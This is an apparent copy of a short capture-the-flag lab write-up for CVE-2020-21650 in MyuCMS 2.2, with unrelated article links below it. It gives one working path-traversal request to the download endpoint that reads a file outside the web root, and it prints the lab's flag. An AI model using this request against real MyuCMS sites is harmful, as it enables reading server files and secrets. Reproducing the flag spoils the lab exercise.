当前位置: 首页 > news >正文

春秋云镜 :CVE-2020-21650(MyuCMS后台rce)

news 2025/8/8 22:39:51

一、题目

 靶标介绍:

MyuCMS开源内容管理系统,采用ThinkPHP开发而成的社区商城聚合,插件,模板,轻便快捷容易扩展 其2.2版本中admin.php/config/add方法存在任意命令执行漏洞.

进入题目:

 exp:

url/index.php/bbs/index/download?url=../../../../../flag&local=1&name

查看flag:

 flag{2d3ea261-8b0c-488b-b15d-5fceba2fa1b6}

http://www.lryc.cn/news/137496.html

相关文章:

  • 测试框架pytest教程(7)实现 xunit 风格的setup
  • 用队列实现栈
  • Anolis 8.6 下 Redis 7.2.0 集群搭建和配置
  • 综合能源系统(8)——综合能源系统支撑技术
  • MySQL5.7数据目录结构
  • Python Opencv实践 - 图像直方图均衡化
  • GAN:对抗生成网络,前向传播和后巷传播的区别
  • 压力变送器的功能与应用
  • 排序算法:选择排序
  • Windows运行Spark所需的Hadoop安装
  • KusionStack使用文档
  • ONLYOFFICE 文档如何与 Alfresco 进行集成
  • PostgreSQL下载路径与安装步骤
  • 如何在PHP中编写条件语句
  • LLM架构自注意力机制Transformers architecture Attention is all you need
  • 计算机网络 QA
  • 安果天气预报 产品介绍
  • net start Mysql 启动服务时 ,显示“Mysql服务正在启动 Mysql服务无法启动 服务没有报告任何错误
  • DAY24
  • Redis过期数据的删除策略
  • 如何使用CSS实现一个拖拽排序效果?
  • leetcode 118.杨辉三角
  • 微服务框架之SpringBoot面试题汇总
  • Promise详解
  • Oracle 查询(当天,月,年)的数据
  • 什么是梯度下降
  • 开黑啦kook 机器人开发 PHP swoole Liunx 服务器(宝塔)
  • Vue 中hash 模式与 history 模式的区别
  • Dockerfile推送私有仓库的两个案例
  • 【指标】指标公式大全,款款经典(建议珍藏)!-神奇指标网